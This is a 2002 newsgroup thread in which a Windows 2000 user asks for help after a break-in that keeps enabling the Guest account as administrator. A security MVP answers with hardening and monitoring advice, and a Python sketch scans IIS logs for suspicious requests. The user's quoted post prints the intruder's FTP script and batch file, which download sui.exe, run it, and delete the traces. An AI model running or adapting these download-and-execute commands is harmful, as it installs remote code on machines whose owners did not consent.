Re: Is it really true that NTFS is secure?
From: George Hester (hesterloli@hotmail.com)
Date: 12/13/02
From: "George Hester" <hesterloli@hotmail.com> Date: Fri, 13 Dec 2002 14:05:53 -0500
I already have been doing a lot of what you suggest. I will be looking into the rest. It looks like I have been able to get the Guest Group from appearing in the Administrators group. I had a Malware BKDR_TASKReg.A when I went to http://www.antivirus.com and the Leroux virus (which is not responsible for this issue).
But the Guest account is still enabling. Logs show nothing.
--
George Hester
__________________________________
"Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message news:#c7LZ5soCHA.2384@TK2MSFTNGP11...
> You can enable auditing to watch for things like this:
>
> http://securityadmin.info/faq.htm#auditing
>
> Checking your IIS web logs is another common place to check. Look for
> anything that mentions .EXE or % and that also has a code 200 or 502 in that
> line. URLScan is a free IIS tool that comes with IISLockdown from
> www.microsoft.com/technet/security that will block all this stuff, if that's
> what this is. Most firewalls won't detect or block this stuff.
>
> Be sure you have a firewall, as this will log all traffic to and from your
> server. The firewall should also block NetBIOS traffic on TCP and UDP ports
> 135-139 and 445 from the internet, as this is another way people could be
> accessing your guest account.
>
> Intrusion detection such as Black Ice or Snort [free] might be worth a try,
> though getting Snort to alert just on interesting events on a Windows server
> takes some knowledge.
>
> The free file change checker from www.gfi.com can also help you monitor your
> system for intrusions not caught by antivirus, trojan scanners or firewalls.
>
> Other things to do to look for the source of the hacking and secure your
> servers and computers are listed at:
>
> http://securityadmin.info/faq.htm#hacked [first]
> http://securityadmin.info/faq.htm#harden [second]
>
>
> "George Hester" <hesterloli@hotmail.com> wrote in message
> news:ufXDRfmoCHA.2424@TK2MSFTNGP12...
> Please understand that my machine comes up empty handed on all AV scans and
> trojans. I need to find some way of watching when this Group Policy change
> happens. Like a log. That tells me the time that it happened or the
> responsible party. It doesn't show in Event Viewer.
>
> You know I ran a server W2K prior to this and never had this issue. Started
> on Prof full time now and I am battling security it seems every hour.
>
> --
> George Hester
> __________________________________
> "George Hester" <hesterloli@hotmail.com> wrote in message
> news:OwrkSZmoCHA.2424@TK2MSFTNGP12...
> Yes you may be able to help me with something. My Guest user keeps getting
> enabled and put in the Administrator group. How?
>
> --
> George Hester
> __________________________________
> "Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message
> news:eleuHGkoCHA.1628@TK2MSFTNGP12...
> > Do you have a problem we could help you with? Are there more details?
> >
> > What does this code have to do with NTFS? I'm sorry if your machine was
> > exploited, though I'm not sure this has to do with NTFS.
> >
> > NTFS file permissions are plenty secure against remote exploits. If you
> > have other security vulnerabilities that permit running commands as an
> > account that has permissions in the NTFS ACLs, that's not exactly an NTFS
> > failing.
> >
> > Windows 2000 configured correctly is as secure as most other operating
> > systems configured correctly. Windows 2000 in the default install is about
> > as un-secure as Linux in the default install, especially if you go back to
> > Linux from the year 2000. Securing Windows 2000 is about as complex and
> > time consuming as securing Linux, maybe even easier.
> >
> > More information on ways to determine how you were hacked and how to secure
> > your computer:
> >
> > http://securityadmin.info/faq.htm#hacked
> > http://securityadmin.info/faq.htm#re-secure
> > http://securityadmin.info/faq.htm#harden
> >
> >
> > "George Hester" <hesterloli@hotmail.com> wrote in message
> > news:uB7a4afoCHA.2220@TK2MSFTNGP09...
> > '--------- File: s.t sitting in %SystemRoot%\system32 ->
> > open #my.ip.address# 'changed ip for privacy
> > binary
> > recv sui.exe .\sui.exe
> > quit
> > /-------- End of s.t
> >
> > REM File r.bat sitting in %SystemRoot%\system32 -->
> > ftp -vnAs:s.t
> > del s.t
> > sui.exe -s678p345 -o
> > call g.bat
> > del r.bat
> > REM End of r.bat --------
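
The IIS log check described in Karl Levinson's quoted reply (requests that mention .EXE or % and return status 200 or 502), sketched in Python as an added example that is not part of the original thread. The log lines are constructed, and restricting the match to the cs-uri-stem and cs-uri-query columns of a W3C extended log is an assumption.

```python
import re

# Constructed sample in IIS W3C extended log format (not from the thread).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-12-13 18:01:10 192.0.2.10 GET /default.htm - 200
2002-12-13 18:02:44 192.0.2.77 GET /scripts/sample.exe arg=1 200
2002-12-13 18:02:45 192.0.2.77 GET /scripts/sample.exe - 404
2002-12-13 18:03:02 192.0.2.77 GET /a%5cb/tool.EXE - 502
2002-12-13 18:04:30 192.0.2.10 GET /my%20docs/index.htm - 200
"""

PATTERN = re.compile(r"\.exe|%", re.IGNORECASE)   # ".EXE or %"
STATUSES = {"200", "502"}                          # "code 200 or 502"


def find_suspicious(log_text):
    """Return (line_no, client_ip, status, request) for each matching entry."""
    fields, hits = [], []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        if line.startswith("#Fields:"):
            # Column layout can change mid-file; always use the latest directive.
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line, or no #Fields directive seen yet
        rec = dict(zip(fields, values))
        stem, query = rec.get("cs-uri-stem", ""), rec.get("cs-uri-query", "-")
        request = stem if query == "-" else stem + "?" + query
        if rec.get("sc-status") in STATUSES and PATTERN.search(request):
            hits.append((line_no, rec.get("c-ip", "-"), rec["sc-status"], request))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print("line %d  %s  status %s  %s" % hit)
```

The `%` test also matches ordinary encodings such as `%20`, as the last sample line shows, so each hit is a lead to review against the client address and timestamp rather than proof of intrusion.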